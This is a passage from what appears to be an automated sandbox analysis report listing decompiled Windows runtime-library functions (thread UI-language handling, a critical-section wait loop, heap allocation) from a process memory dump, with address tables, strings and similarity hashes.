						_v32 = 0;
						__eflags = _t170 & 0xffff7cf2;
						if((_t170 & 0xffff7cf2) != 0) {
							L43:
							_t77 = 0xc000000d;
						} else {
							_t79 = _t170 & 0x0000000c;
							__eflags = _t79;
							if(_t79 != 0) {
								__eflags = _t79 - 0xc;
								if(_t79 == 0xc) {
									goto L43;
								} else {
									goto L9;
								}
							} else {
								_t170 = _t170 | 0x00000008;
								__eflags = _t170;
								L9:
								_t81 = _t170 & 0x00000300;
								__eflags = _t81 - 0x300;
								if(_t81 == 0x300) {
									goto L43;
								} else {
									_t138 = _t170 & 0x00000001;
									__eflags = _t138;
									_v24 = _t138;
									if(_t138 != 0) {
										__eflags = _t81;
										if(_t81 != 0) {
											goto L43;
										} else {
											goto L11;
										}
									} else {
										L11:
										_push(_t129);
										_t77 = E04B76D90( &_v20);
										_t130 = _t77;
										__eflags = _t130;
										if(_t130 >= 0) {
											_push(_t174);
											__eflags = _t170 & 0x00000301;
											if((_t170 & 0x00000301) == 0) {
												_t176 = _a8;
												__eflags = _t176;
												if(__eflags == 0) {
													L64:
													_t83 =  *[fs:0x18];
													_t177 = 0;
													__eflags =  *(_t83 + 0xfb8);
													if( *(_t83 + 0xfb8) != 0) {
														E04B776E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
													}
													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
													goto L15;
												} else {
													asm("sbb edx, edx");
													_t114 = E04C08938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
													__eflags = _t114;
													if(_t114 < 0) {
														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
														E04B6B150();
													}
													_t116 = E04C06D81(_t176,  &_v16);
													__eflags = _t116;
													if(_t116 >= 0) {
														__eflags = _v16 - 2;
														if(_v16 < 2) {
															L56:
															_t118 = E04B775CE(_v20, 5, 0);
															__eflags = _t118;
															if(_t118 < 0) {
																L67:
																_t130 = 0xc0000017;
																goto L32;
															} else {
																__eflags = _v12;
																if(_v12 == 0) {
																	goto L67;
																} else {
																	_t153 =  *0x4c58638; // 0xaa1b28
																	_t122 = L04B738A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
																	_t154 = _v12;
																	_t130 = _t122;
																	__eflags = _t130;
																	if(_t130 >= 0) {
																		_t123 =  *(_t154 + 4) & 0x0000ffff;
																		__eflags = _t123;
																		if(_t123 != 0) {
																			_t155 = _a12;
																			__eflags = _t155;
																			if(_t155 != 0) {
																				 *_t155 = _t123;
																			}
																			goto L64;
																		} else {
																			E04B776E2(_t154);
																			goto L41;
																		}
																	} else {
																		E04B776E2(_t154);
																		_t177 = 0;
																		goto L18;
																	}
																}
															}
														} else {
															__eflags =  *_t176;
															if( *_t176 != 0) {
																goto L56;
															} else {
																__eflags =  *(_t176 + 2);
																if( *(_t176 + 2) == 0) {
																	goto L64;
																} else {
																	goto L56;
																}
															}
														}
													} else {
														_t130 = 0xc000000d;
														goto L32;
													}
												}
												goto L35;
											} else {
												__eflags = _a8;
												if(_a8 != 0) {
													_t77 = 0xc000000d;
												} else {
													_v5 = 1;
													L04B9FCE3(_v20, _t170);
													_t177 = 0;
													__eflags = 0;
													L15:
													_t85 =  *[fs:0x18];
													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
														L18:
														__eflags = _t130;
														if(_t130 != 0) {
															goto L32;
														} else {
															__eflags = _v5 - _t130;
															if(_v5 == _t130) {
																goto L32;
															} else {
																_t86 =  *[fs:0x18];
																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
																}
																__eflags = _t177;
																if(_t177 == 0) {
																	L31:
																	__eflags = 0;
																	L04B770F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
																	goto L32;
																} else {
																	__eflags = _v24;
																	_t91 =  *(_t177 + 0x20);
																	if(_v24 != 0) {
																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
																		goto L31;
																	} else {
																		_t141 = _t91 & 0x00000040;
																		__eflags = _t170 & 0x00000100;
																		if((_t170 & 0x00000100) == 0) {
																			__eflags = _t141;
																			if(_t141 == 0) {
																				L74:
																				_t94 = _t91 & 0xfffffffd | 0x00000004;
																				goto L27;
																			} else {
																				_t177 = E04B9FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					goto L42;
																				} else {
																					_t130 = E04B9FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						_t68 = _t177 + 0x20;
																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
																						__eflags =  *_t68;
																						_t91 =  *(_t177 + 0x20);
																						goto L74;
																					}
																				}
																			}
																			goto L35;
																		} else {
																			__eflags = _t141;
																			if(_t141 != 0) {
																				_t177 = E04B9FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					L42:
																					_t77 = 0xc0000001;
																					goto L33;
																				} else {
																					_t130 = E04B9FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
																						_t91 =  *(_t177 + 0x20);
																						goto L26;
																					}
																				}
																				goto L35;
																			} else {
																				L26:
																				_t94 = _t91 & 0xfffffffb | 0x00000002;
																				__eflags = _t94;
																				L27:
																				 *(_t177 + 0x20) = _t94;
																				__eflags = _t170 & 0x00008000;
																				if((_t170 & 0x00008000) != 0) {
																					_t95 = _a12;
																					__eflags = _t95;
																					if(_t95 != 0) {
																						_t96 =  *_t95;
																						__eflags = _t96;
																						if(_t96 != 0) {
																							 *((short*)(_t177 + 0x22)) = 0;
																							_t40 = _t177 + 0x20;
																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
																							__eflags =  *_t40;
																						}
																					}
																				}
																				goto L31;
																			}
																		}
																	}
																}
															}
														}
													} else {
														_t147 =  *( *[fs:0x18] + 0xfc0);
														_t106 =  *(_t147 + 0x20);
														__eflags = _t106 & 0x00000040;
														if((_t106 & 0x00000040) != 0) {
															_t147 = E04B9FD22(_t147);
															__eflags = _t147;
															if(_t147 == 0) {
																L41:
																_t130 = 0xc0000001;
																L32:
																_t77 = _t130;
																goto L33;
															} else {
																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
																_t106 =  *(_t147 + 0x20);
																goto L17;
															}
															goto L35;
														} else {
															L17:
															_t108 = _t106 | 0x00000080;
															__eflags = _t108;
															 *(_t147 + 0x20) = _t108;
															 *( *[fs:0x18] + 0xfc0) = _t147;
															goto L18;
														}
													}
												}
											}
											L33:
										}
									}
								}
							}
						}
						L35:
						return _t77;
					} else {
						 *_t75 = 0x4c57b80;
						 *((intOrPtr*)(_t75 + 4)) = _t134;
						 *_t134 = _t75;
						 *0x4c57b84 = _t75;
						_t73 = E04B7EB70(_t134, 0x4c57b60);
						if( *0x4c57b20 != 0) {
							_t73 =  *( *[fs:0x30] + 0xc);
							if( *((char*)(_t73 + 0x28)) == 0) {
								_t73 = E04B7FF60( *0x4c57b20);
							}
						}
						goto L5;
					}
				}
			}

0x04b9fab0
0x04b9fab2
0x04b9fab3
0x04b9fab4
0x04b9fabc
0x04b9fac0
0x04b9fb14
0x04b9fb17
0x04b9fac2
0x04b9fac8
0x04b9facd
0x04b9fad3
0x04b9fad3
0x04b9fadd
0x04b9fb18
0x04b9fb1b
0x04b9fb1d
0x04b9fb1e
0x04b9fb1f
0x04b9fb20
0x04b9fb21
0x04b9fb22
0x04b9fb23
0x04b9fb24
0x04b9fb25
0x04b9fb26
0x04b9fb27
0x04b9fb28
0x04b9fb29
0x04b9fb2a
0x04b9fb2b
0x04b9fb2c
0x04b9fb2d
0x04b9fb2e
0x04b9fb2f
0x04b9fb3a
0x04b9fb3b
0x04b9fb3e
0x04b9fb41
0x04b9fb44
0x04b9fb47
0x04b9fb4a
0x04b9fb4d
0x04b9fb53
0x04bdbdcb
0x04bdbdcb
0x04b9fb59
0x04b9fb5b
0x04b9fb5b
0x04b9fb5e
0x04bdbdd5
0x04bdbdd8
0x00000000
0x04bdbdda
0x00000000
0x04bdbdda
0x04b9fb64
0x04b9fb64
0x04b9fb64
0x04b9fb67
0x04b9fb6e
0x04b9fb70
0x04b9fb72
0x00000000
0x04b9fb78
0x04b9fb7a
0x04b9fb7a
0x04b9fb7d
0x04b9fb80
0x04bdbddf
0x04bdbde1
0x00000000
0x04bdbde3
0x00000000
0x04bdbde3
0x04b9fb86
0x04b9fb86
0x04b9fb86
0x04b9fb8b
0x04b9fb90
0x04b9fb92
0x04b9fb94
0x04b9fb9a
0x04b9fb9b
0x04b9fba1
0x04bdbde8
0x04bdbdeb
0x04bdbded
0x04bdbeb5
0x04bdbeb5
0x04bdbebb
0x04bdbebd
0x04bdbec3
0x04bdbed2
0x04bdbedd
0x04bdbedd
0x04bdbeed
0x00000000
0x04bdbdf3
0x04bdbdfe
0x04bdbe06
0x04bdbe0b
0x04bdbe0d
0x04bdbe0f
0x04bdbe14
0x04bdbe19
0x04bdbe20
0x04bdbe25
0x04bdbe27
0x04bdbe35
0x04bdbe39
0x04bdbe46
0x04bdbe4f
0x04bdbe54
0x04bdbe56
0x04bdbef8
0x04bdbef8
0x00000000
0x04bdbe5c
0x04bdbe5c
0x04bdbe60
0x00000000
0x04bdbe66
0x04bdbe66
0x04bdbe7f
0x04bdbe84
0x04bdbe87
0x04bdbe89
0x04bdbe8b
0x04bdbe99
0x04bdbe9d
0x04bdbea0
0x04bdbeac
0x04bdbeaf
0x04bdbeb1
0x04bdbeb3
0x04bdbeb3
0x00000000
0x04bdbea2
0x04bdbea2
0x00000000
0x04bdbea2
0x04bdbe8d
0x04bdbe8d
0x04bdbe92
0x00000000
0x04bdbe92
0x04bdbe8b
0x04bdbe60
0x04bdbe3b
0x04bdbe3b
0x04bdbe3e
0x00000000
0x04bdbe40
0x04bdbe40
0x04bdbe44
0x00000000
0x00000000
0x00000000
0x00000000
0x04bdbe44
0x04bdbe3e
0x04bdbe29
0x04bdbe29
0x00000000
0x04bdbe29
0x04bdbe27
0x00000000
0x04b9fba7
0x04b9fba7
0x04b9fbab
0x04bdbf02
0x04b9fbb1
0x04b9fbb1
0x04b9fbb8
0x04b9fbbd
0x04b9fbbd
0x04b9fbbf
0x04b9fbbf
0x04b9fbc5
0x04b9fbcb
0x04b9fbf8
0x04b9fbf8
0x04b9fbfa
0x00000000
0x04b9fc00
0x04b9fc00
0x04b9fc03
0x00000000
0x04b9fc09
0x04b9fc09
0x04b9fc0f
0x04b9fc15
0x04b9fc23
0x04b9fc23
0x04b9fc25
0x04b9fc27
0x04b9fc75
0x04b9fc7c
0x04b9fc84
0x00000000
0x04b9fc29
0x04b9fc29
0x04b9fc2d
0x04b9fc30
0x04bdbf0f
0x00000000
0x04b9fc36
0x04b9fc38
0x04b9fc3b
0x04b9fc41
0x04bdbf17
0x04bdbf19
0x04bdbf48
0x04bdbf4b
0x00000000
0x04bdbf1b
0x04bdbf22
0x04bdbf24
0x04bdbf26
0x00000000
0x04bdbf2c
0x04bdbf37
0x04bdbf39
0x04bdbf3b
0x00000000
0x04bdbf41
0x04bdbf41
0x04bdbf41
0x04bdbf41
0x04bdbf45
0x00000000
0x04bdbf45
0x04bdbf3b
0x04bdbf26
0x00000000
0x04b9fc47
0x04b9fc47
0x04b9fc49
0x04b9fcb2
0x04b9fcb4
0x04b9fcb6
0x04b9fcdc
0x04b9fcdc
0x00000000
0x04b9fcb8
0x04b9fcc3
0x04b9fcc5
0x04b9fcc7
0x00000000
0x04b9fcc9
0x04b9fcc9
0x04b9fccd
0x00000000
0x04b9fccd
0x04b9fcc7
0x00000000
0x04b9fc4b
0x04b9fc4b
0x04b9fc4e
0x04b9fc4e
0x04b9fc51
0x04b9fc51
0x04b9fc54
0x04b9fc5a
0x04b9fc5c
0x04b9fc5f
0x04b9fc61
0x04b9fc63
0x04b9fc65
0x04b9fc67
0x04b9fc6e
0x04b9fc72
0x04b9fc72
0x04b9fc72
0x04b9fc72
0x04b9fc67
0x04b9fc61
0x00000000
0x04b9fc5a
0x04b9fc49
0x04b9fc41
0x04b9fc30
0x04b9fc27
0x04b9fc03
0x04b9fbcd
0x04b9fbd3
0x04b9fbd9
0x04b9fbdc
0x04b9fbde
0x04b9fc99
0x04b9fc9b
0x04b9fc9d
0x04b9fcd5
0x04b9fcd5
0x04b9fc89
0x04b9fc89
0x00000000
0x04b9fc9f
0x04b9fc9f
0x04b9fca3
0x00000000
0x04b9fca3
0x00000000
0x04b9fbe4
0x04b9fbe4
0x04b9fbe4
0x04b9fbe4
0x04b9fbe9
0x04b9fbf2
0x00000000
0x04b9fbf2
0x04b9fbde
0x04b9fbcb
0x04b9fbab
0x04b9fc8b
0x04b9fc8b
0x04b9fc8c
0x04b9fb80
0x04b9fb72
0x04b9fb5e
0x04b9fc8d
0x04b9fc91
0x04b9fadf
0x04b9fadf
0x04b9fae1
0x04b9fae4
0x04b9fae7
0x04b9faec
0x04b9faf8
0x04b9fb00
0x04b9fb07
0x04b9fb0f
0x04b9fb0f
0x04b9fb07
0x00000000
0x04b9faf8
0x04b9fadd

Strings

*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 04BDBE0F

Memory Dump Source

Source File: 00000011.00000002.564045027.0000000004B40000.00000040.00000001.sdmp, Offset: 04B40000, based on PE: true

Associated: 00000011.00000002.564351745.0000000004C5B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.564386152.0000000004C5F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
API String ID: 0-865735534
Opcode ID: a89e14ec1978592139bce3eb83566e456dc4de80e6ece9a9699fce9b7a2aeaef
Instruction ID: 693ca3631c087657b1ce0b11636efdb5633bc37c4bd6b01fdbc2646659423f91
Opcode Fuzzy Hash: a89e14ec1978592139bce3eb83566e456dc4de80e6ece9a9699fce9b7a2aeaef
Instruction Fuzzy Hash: 16A1DD71B006069BEF259F68C450B7AB3F5EB48724F0589F9E916DB690EB30FC419B90

Uniqueness

Uniqueness Score: -1.00%

Function 04B62D8A, Relevance: 1.4, Strings: 1, Instructions: 191
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E04B62D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
				signed char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v52;
				void* __esi;
				void* __ebp;
				intOrPtr _t55;
				signed int _t57;
				signed int _t58;
				char* _t62;
				signed char* _t63;
				signed char* _t64;
				signed int _t67;
				signed int _t72;
				signed int _t77;
				signed int _t78;
				signed int _t88;
				intOrPtr _t89;
				signed char _t93;
				signed int _t97;
				signed int _t98;
				signed int _t102;
				signed int _t103;
				intOrPtr _t104;
				signed int _t105;
				signed int _t106;
				signed char _t109;
				signed int _t111;
				void* _t116;

				_t102 = __edi;
				_t97 = __edx;
				_v12 = _v12 & 0x00000000;
				_t55 =  *[fs:0x18];
				_t109 = __ecx;
				_v8 = __edx;
				_t86 = 0;
				_v32 = _t55;
				_v24 = 0;
				_push(__edi);
				if(__ecx == 0x4c55350) {
					_t86 = 1;
					_v24 = 1;
					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
				}
				_t103 = _t102 | 0xffffffff;
				if( *0x4c57bc8 != 0) {
					_push(0xc000004b);
					_push(_t103);
					E04BA97C0();
				}
				if( *0x4c579c4 != 0) {
					_t57 = 0;
				} else {
					_t57 = 0x4c579c8;
				}
				_v16 = _t57;
				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
					_t93 = _t109;
					L23();
				}
				_t58 =  *_t109;
				if(_t58 == _t103) {
					__eflags =  *(_t109 + 0x14) & 0x01000000;
					_t58 = _t103;
					if(__eflags == 0) {
						_t93 = _t109;
						E04B91624(_t86, __eflags);
						_t58 =  *_t109;
					}
				}
				_v20 = _v20 & 0x00000000;
				if(_t58 != _t103) {
					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
				}
				_t104 =  *((intOrPtr*)(_t109 + 0x10));
				_t88 = _v16;
				_v28 = _t104;
				L9:
				while(1) {
					if(E04B87D50() != 0) {
						_t62 = ( *[fs:0x30])[0x50] + 0x228;
					} else {
						_t62 = 0x7ffe0382;
					}
					if( *_t62 != 0) {
						_t63 =  *[fs:0x30];
						__eflags = _t63[0x240] & 0x00000002;
						if((_t63[0x240] & 0x00000002) != 0) {
							_t93 = _t109;
							E04BFFE87(_t93);
						}
					}
					if(_t104 != 0xffffffff) {
						_push(_t88);
						_push(0);
						_push(_t104);
						_t64 = E04BA9520();
						goto L15;
					} else {
						while(1) {
							_t97 =  &_v8;
							_t64 = E04B9E18B(_t109 + 4, _t97, 4, _t88, 0);
							if(_t64 == 0x102) {
								break;
							}
							_t93 =  *(_t109 + 4);
							_v8 = _t93;
							if((_t93 & 0x00000002) != 0) {
								continue;
							}
							L15:
							if(_t64 == 0x102) {
								break;
							}
							_t89 = _v24;
							if(_t64 < 0) {
								L04BBDF30(_t93, _t97, _t64);
								_push(_t93);
								_t98 = _t97 | 0xffffffff;
								__eflags =  *0x4c56901;
								_push(_t109);
								_v52 = _t98;
								if( *0x4c56901 != 0) {
									_push(0);
									_push(1);
									_push(0);
									_push(0x100003);
									_push( &_v12);
									_t72 = E04BA9980();
									__eflags = _t72;
									if(_t72 < 0) {
										_v12 = _t98 | 0xffffffff;
									}
								}
								asm("lock cmpxchg [ecx], edx");
								_t111 = 0;
								__eflags = 0;
								if(0 != 0) {
									__eflags = _v12 - 0xffffffff;
									if(_v12 != 0xffffffff) {
										_push(_v12);
										E04BA95D0();
									}
								} else {
									_t111 = _v12;
								}
								return _t111;
							} else {
								if(_t89 != 0) {
									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
									_t77 = E04B87D50();
									__eflags = _t77;
									if(_t77 == 0) {
										_t64 = 0x7ffe0384;
									} else {
										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
									}
									__eflags =  *_t64;
									if( *_t64 != 0) {
										_t64 =  *[fs:0x30];
										__eflags = _t64[0x240] & 0x00000004;
										if((_t64[0x240] & 0x00000004) != 0) {
											_t78 = E04B87D50();
											__eflags = _t78;
											if(_t78 == 0) {
												_t64 = 0x7ffe0385;
											} else {
												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
											}
											__eflags =  *_t64 & 0x00000020;
											if(( *_t64 & 0x00000020) != 0) {
												_t64 = E04BE7016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
											}
										}
									}
								}
								return _t64;
							}
						}
						_t97 = _t88;
						_t93 = _t109;
						E04BFFDDA(_t97, _v12);
						_t105 =  *_t109;
						_t67 = _v12 + 1;
						_v12 = _t67;
						__eflags = _t105 - 0xffffffff;
						if(_t105 == 0xffffffff) {
							_t106 = 0;
							__eflags = 0;
						} else {
							_t106 =  *(_t105 + 0x14);
						}
						__eflags = _t67 - 2;
						if(_t67 > 2) {
							__eflags = _t109 - 0x4c55350;
							if(_t109 != 0x4c55350) {
								__eflags = _t106 - _v20;
								if(__eflags == 0) {
									_t93 = _t109;
									E04BFFFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
								}
							}
						}
						_push("RTL: Re-Waiting\n");
						_push(0);
						_push(0x65);
						_v20 = _t106;
						E04BF5720();
						_t104 = _v28;
						_t116 = _t116 + 0xc;
						continue;
					}
				}
			}

0x04b62d8a
0x04b62d8a
0x04b62d92
0x04b62d96
0x04b62d9e
0x04b62da0
0x04b62da3
0x04b62da5
0x04b62da8
0x04b62dab
0x04b62db2
0x04bbf9aa
0x04bbf9ab
0x04bbf9ae
0x04bbf9ae
0x04b62db8
0x04b62dc2
0x04bbf9b9
0x04bbf9be
0x04bbf9bf
0x04bbf9bf
0x04b62dcf
0x04bbf9c9
0x04b62dd5
0x04b62dd5
0x04b62dd5
0x04b62dde
0x04b62de1
0x04b62e70
0x04b62e72
0x04b62e72
0x04b62de7
0x04b62deb
0x04b62e7c
0x04b62e83
0x04b62e85
0x04b62e8b
0x04b62e8d
0x04b62e92
0x04b62e92
0x04b62e85
0x04b62df1
0x04b62df7
0x04b62df9
0x04b62df9
0x04b62dfc
0x04b62dff
0x04b62e02
0x00000000
0x04b62e05
0x04b62e0c
0x04bbf9d9
0x04b62e12
0x04b62e12
0x04b62e12
0x04b62e1a
0x04bbf9e3
0x04bbf9e9
0x04bbf9f0
0x04bbf9f6
0x04bbf9f8
0x04bbf9f8
0x04bbf9f0
0x04b62e23
0x04bbfa02
0x04bbfa03
0x04bbfa05
0x04bbfa06
0x00000000
0x04b62e29
0x04b62e29
0x04b62e2e
0x04b62e34
0x04b62e3e
0x00000000
0x00000000
0x04b62e44
0x04b62e47
0x04b62e4d
0x00000000
0x00000000
0x04b62e4f
0x04b62e54
0x00000000
0x00000000
0x04b62e5a
0x04b62e5f
0x04b62e9a
0x04b62ea4
0x04b62ea5
0x04b62ea8
0x04b62eaf
0x04b62eb2
0x04b62eb5
0x04bbfae9
0x04bbfaeb
0x04bbfaed
0x04bbfaef
0x04bbfaf7
0x04bbfaf8
0x04bbfafd
0x04bbfaff
0x04bbfb04
0x04bbfb04
0x04bbfaff
0x04b62ec0
0x04b62ec4
0x04b62ec6
0x04b62ec8
0x04bbfb14
0x04bbfb18
0x04bbfb1e
0x04bbfb21
0x04bbfb21
0x04b62ece
0x04b62ece
0x04b62ece
0x04b62ed7
0x04b62e61
0x04b62e63
0x04bbfa6b
0x04bbfa71
0x04bbfa76
0x04bbfa78
0x04bbfa8a
0x04bbfa7a
0x04bbfa83
0x04bbfa83
0x04bbfa8f
0x04bbfa91
0x04bbfa97
0x04bbfa9d
0x04bbfaa4
0x04bbfaaa
0x04bbfaaf
0x04bbfab1
0x04bbfac3
0x04bbfab3
0x04bbfabc
0x04bbfabc
0x04bbfac8
0x04bbfacb
0x04bbfadf
0x04bbfadf
0x04bbfacb
0x04bbfaa4
0x04bbfa91
0x04b62e6f
0x04b62e6f
0x04b62e5f
0x04bbfa13
0x04bbfa15
0x04bbfa17
0x04bbfa1f
0x04bbfa21
0x04bbfa22
0x04bbfa25
0x04bbfa28
0x04bbfa2f
0x04bbfa2f
0x04bbfa2a
0x04bbfa2a
0x04bbfa2a
0x04bbfa31
0x04bbfa34
0x04bbfa36
0x04bbfa3c
0x04bbfa3e
0x04bbfa41
0x04bbfa43
0x04bbfa45
0x04bbfa45
0x04bbfa41
0x04bbfa3c
0x04bbfa4a
0x04bbfa4f
0x04bbfa51
0x04bbfa53
0x04bbfa56
0x04bbfa5b
0x04bbfa5e
0x00000000
0x04bbfa5e
0x04b62e23

Strings

RTL: Re-Waiting, xrefs: 04BBFA4A

Memory Dump Source

Source File: 00000011.00000002.564045027.0000000004B40000.00000040.00000001.sdmp, Offset: 04B40000, based on PE: true

Associated: 00000011.00000002.564351745.0000000004C5B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.564386152.0000000004C5F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: RTL: Re-Waiting
API String ID: 0-316354757
Opcode ID: 601af1d57cac346e92d37528b38ba20128ad31416c88c4387fca2ac9ebc64ffc
Instruction ID: efbc0cd1210745191233a17195e758390f3cda252818d17c4497b235b1305efa
Opcode Fuzzy Hash: 601af1d57cac346e92d37528b38ba20128ad31416c88c4387fca2ac9ebc64ffc
Instruction Fuzzy Hash: A1612471B00604AFEB29EF68CC40BBEB7B5EB44318F1406E9D896972C0D7B8B941D791

Uniqueness

Uniqueness Score: -1.00%

Function 04C30EA5, Relevance: 1.4, Strings: 1, Instructions: 153
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E04C30EA5(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				unsigned int _v32;
				signed int _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v64;
				void* __ebx;
				void* __edi;
				signed int _t58;
				unsigned int _t60;
				intOrPtr _t62;
				char* _t67;
				char* _t69;
				void* _t80;
				void* _t83;
				intOrPtr _t93;
				intOrPtr _t115;
				char _t117;
				void* _t120;

				_t83 = __edx;
				_t117 = 0;
				_t120 = __ecx;
				_v44 = 0;
				if(E04C2FF69(__ecx,  &_v44,  &_v32) < 0) {
					L24:
					_t109 = _v44;
					if(_v44 != 0) {
						E04C31074(_t83, _t120, _t109, _t117, _t117);
					}
					L26:
					return _t117;
				}
				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
				_t5 = _t83 + 1; // 0x1
				_v36 = _t5 << 0xc;
				_v40 = _t93;
				_t58 =  *(_t93 + 0xc) & 0x40000000;
				asm("sbb ebx, ebx");
				_t83 = ( ~_t58 & 0x0000003c) + 4;
				if(_t58 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t93);
					_push(0xffffffff);
					_t80 = E04BA9730();
					_t115 = _v64;
					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
						_push(_t93);
						E04C2A80D(_t115, 1, _v20, _t117);
						_t83 = 4;
					}
				}
				if(E04C2A854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
					goto L24;
				}
				_t60 = _v32;
				_t97 = (_t60 != 0x100000) + 1;
				_t83 = (_v44 -  *0x4c58b04 >> 0x14) + (_v44 -  *0x4c58b04 >> 0x14);
				_v28 = (_t60 != 0x100000) + 1;
				_t62 = _t83 + (_t60 >> 0x14) * 2;
				_v40 = _t62;
				if(_t83 >= _t62) {
					L10:
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					if(E04B87D50() == 0) {
						_t67 = 0x7ffe0380;
					} else {
						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E04C2138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
					}
					if(E04B87D50() == 0) {
						_t69 = 0x7ffe0388;
					} else {
						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t69 != 0) {
						E04C1FEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
					}
					if(( *0x4c58724 & 0x00000008) != 0) {
						E04C252F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
					}
					_t117 = _v44;
					goto L26;
				}
				while(E04C315B5(0x4c58ae4, _t83, _t97, _t97) >= 0) {
					_t97 = _v28;
					_t83 = _t83 + 2;
					if(_t83 < _v40) {
						continue;
					}
					goto L10;
				}
				goto L24;
			}

0x04c30eb7
0x04c30eb9
0x04c30ec0
0x04c30ec2
0x04c30ecd
0x04c3105b
0x04c3105b
0x04c31061
0x04c31066
0x04c31066
0x04c3106b
0x04c31073
0x04c31073
0x04c30ed3
0x04c30ed6
0x04c30edc
0x04c30ee0
0x04c30ee7
0x04c30ef0
0x04c30ef5
0x04c30efa
0x04c30efc
0x04c30efd
0x04c30f03
0x04c30f04
0x04c30f06
0x04c30f07
0x04c30f09
0x04c30f0e
0x04c30f14
0x04c30f23
0x04c30f2d
0x04c30f34
0x04c30f34
0x04c30f14
0x04c30f52
0x00000000
0x00000000
0x04c30f58
0x04c30f73
0x04c30f74
0x04c30f79
0x04c30f7d
0x04c30f80
0x04c30f86
0x04c30fab
0x04c30fb5
0x04c30fc6
0x04c30fd1
0x04c30fe3
0x04c30fd3
0x04c30fdc
0x04c30fdc
0x04c30feb
0x04c31009
0x04c31009
0x04c31015
0x04c31027
0x04c31017
0x04c31020
0x04c31020
0x04c3102f
0x04c3103c
0x04c3103c
0x04c31048
0x04c31050
0x04c31050
0x04c31055
0x00000000
0x04c31055
0x04c30f88
0x04c30f9e
0x04c30fa2
0x04c30fa9
0x00000000
0x00000000
0x00000000
0x04c30fa9
0x00000000

Strings

`, xrefs: 04C30F16

Memory Dump Source

Source File: 00000011.00000002.564045027.0000000004B40000.00000040.00000001.sdmp, Offset: 04B40000, based on PE: true

Associated: 00000011.00000002.564351745.0000000004C5B000.00000040.00000001.sdmp Download File
Associated: 00000011.00000002.564386152.0000000004C5F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: `
API String ID: 0-2679148245
Opcode ID: 2e2d533a8d9f30713ef1afd8764a91fec745dc2804026d221225e335af1e4af3
Instruction ID: 6154c5b1cf23ea61605775413d85bd33eea4103d4bdd5d4d2e20a2aea8149223
Opcode Fuzzy Hash: 2e2d533a8d9f30713ef1afd8764a91fec745dc2804026d221225e335af1e4af3
Instruction Fuzzy Hash: 8F51C2712083419FE325DF29D984B2BB7E6EBC8304F08492CF99697290DB71F945CB62

Uniqueness

Uniqueness Score: -1.00%

Function 04B9F0BF, Relevance: 1.4, Strings: 1, Instructions: 137
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E04B9F0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char* _v20;
